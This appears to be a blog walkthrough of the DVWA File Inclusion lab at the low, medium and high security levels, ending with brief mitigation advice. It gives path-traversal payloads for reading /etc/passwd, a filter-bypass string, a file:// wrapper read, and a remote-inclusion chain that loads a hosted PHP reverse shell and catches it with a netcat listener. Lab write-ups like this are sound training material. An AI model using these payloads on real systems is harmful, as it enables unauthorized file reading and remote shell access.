DVWA - File Inclusion (Low/Med/High)

DVWA – File Inclusion (Low/Med/High)

In this walk through, we will be going through the File Inclusion vulnerability section from DVWA Labs. We will be exploring and learning about File Inclusion attacks and what makes an application vulnerable to it. We will start with the security level as Low and will gradually increase the difficulty as we progress further. So, let’s get started with the Hacking without any delay.

File Inclusion

File Inclusion Attacks:

File Inclusion attack involves when an attacker included a file, usually exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. The attacker thus can read sensitive files on the target server. There are two types of File inclusion Vulnerabilities:

  • Local File Inclusion (LFI) – In a LFI attack, attacker can include and read local files on the target server or machine.
  • Remote File Inclusion (RFI) – In a RFI attack, attacker can includes and call for a file on a remote server or machine. This can also lead to Remote Code Execution on the target.

Security: Low (File Inclusion)

  • Setting up the security to low with PHPIDS enabled.

Security level Low

  • The challenge has three files that are potentially vulnerable to file inclusion.

File inclusion

  • I started and the first file and then proceeded with the next two to check if the endpoint is vulnerable to LFI by using some common payloads however it got flagged with PHPIDS.

http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd

http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd%00

http://localhost/vulnerabilities/fi/?page=../../../../../../etc/passwd

PHPIDS flagged

  • The source code seems simple as the code is using a GET page parameter.

low.php

  • I disabled the PHPIDS and try the below payload to read the contents of the /etc/passwd file and it worked.

Security level low

../../../../../../etc/passwd

../.../.../.../etc/passwd

/etc/passwd file

  • I manually just incremented the file number to 4 and found also found a hidden page.

http://localhost/vulnerabilities/fi/?page=file4.php

file4.php

File Inclusion

  • Let’s check the application for RFI. I tested with the URL of google and it worked.

http://localhost/vulnerabilities/fi/?page=http://google.com

checking for LFI

Google search

  • Let’s generate a PHP reverse shell payload and host it on your local server. We will then use the vulnerable endpoint to call it and execute it on the server which will give us a reverse connection back to our machine. I used the PHP reverse shell from Pentest Monkey and changed the ip inside it.

Changing the IP address

  • Set up our malicious server hosting over payload.

python3 -m http.server

python http server

  • Executing it on the server gives us remote access to the server.

http://localhost/vulnerabilities/fi/?page=http://192.168.29.81:8000/shell.php

shell.php

netcat listener

Security: Medium (File Inclusion)

  • Setting up the security to Medium with PHPIDS enabled.

DVWA - File Inclusion (Low/Med/High)

  • I analyzed the source code for this one and found out that the application is filtering for characters like “http:// and https://” and “/” and replacing it to null characters to avoid execution.

medium.php

  • I try to bypass it by encoding our malicious file path.

URL Encoder: https://urlencoder.io

URL encode online

  • It didn’t work. I tried the double encoding but it didn’t work either.

URL encode online

  • After disabling the PHPIDS and running the below payload. I got the reverse connection back.

Security level medium

hhttp://thttp://thttp://phttp://:http://http:///http:///192.168.29.81:8000/shell.php

shell.php payload

netcat listener

  • I tried various payloads but was unable to bypass the PHPIDS.

PHPIDS flagged

Security: High (File Inclusion)

  • Setting up the security to High with PHPIDS enabled.

Security level high

  • As per the source code now the input validation in the application is strict and the page parameter should only have include.php and a file name starting with file. RFI won’t work on this.

high.php

  • We can still use the File:// wrapper to read the contents of the local file. This can be used in conjunction of a file upload vulnerability to get a RFI. This worked only when PHPIDS is disabled.

http://localhost/vulnerabilities/fi/?page=file:////etc/passwd

DVWA - File Inclusion (Low/Med/High)

/etc/passwd

Also Read: DVWA – Cross Site Request Forgery (Low/Med/High)

Conclusion:

Conclusion

So, we finally completed all the security levels for the DVWA File Inclusion Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential File Inclusion attacks by disabling “allow_url_include” and “allow_url_fopen” in PHP configuration files and sanitizing the user input. On that note, i will take your leave and will meet you in next one with another DVWA vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top